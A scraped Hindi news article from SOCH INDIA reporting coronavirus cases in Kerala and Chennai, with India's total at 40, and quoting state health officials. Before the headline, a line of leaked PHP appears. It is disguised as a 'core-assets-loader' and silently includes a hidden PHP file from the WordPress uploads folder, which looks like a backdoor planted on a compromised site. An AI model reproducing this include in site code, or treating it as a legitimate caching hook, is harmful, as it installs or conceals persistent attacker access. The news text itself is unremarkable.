add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); केरल के बाद चेन्नई में भी कोरोना वायरस का पॉजिटिव केस, अब तक 40 मरीजों की पुष्टि – SOCH INDIA
Menu

देश
केरल के बाद चेन्नई में भी कोरोना वायरस का पॉजिटिव केस, अब तक 40 मरीजों की पुष्टि

nobanner

भारत में कोरोना वायरस के मामले बढ़ते जा रहे हैं. रविवार को 6 और मामले सामने आए हैं, जिसके बाद देश में अब कोरोना वायरस के 40 मामले हो गए हैं. रविवार सुबह केरल में 5 मरीजों का सैंपल टेस्ट पॉजिटिव पाए जाने के बाद अब चेन्नई में एक मरीज का केस पॉजिटिव पाया गया है.

तमिलनाडु के स्वास्थ्य सचिव बीला राजेश ने कहा कि हमने आज समीक्षा बैठक की. 28 फरवरी को एक यात्री मस्कट से आया था. 4 मार्च को बुखार की शिकायत के बाद वह अस्पताल में भर्ती हुआ. बाद में जब उसका सैंपल टेस्ट किया गया तो वो पॉजिटिव निकला. मरीज के परिवार के लोगों को निगरानी में रखा गया है. उन्होंने कहा कि विदेश से आने वाले सभी यात्रियों की जांच की जा रही है. हम सरकार के सभी निर्देश का पालन कर रहे हैं.

वहीं, केरल की स्वास्थ्य मंत्री ने कहा कि राज्य में कोरोना वायरस के 5 नए मामले आए हैं. पांचों मरीजों का सैंपल टेस्ट पॉजिटिव पाया गया है. उन्हें पथानामथिट्टा के अस्पताल के आइसोलेशन वार्ड में रखा गया है. पांच में तीन लोग हाल ही में इटली से लौटे थे, जिसके कारण पथानामथिट्टा जिले में दो और लोगों को यह बीमारी हो गई.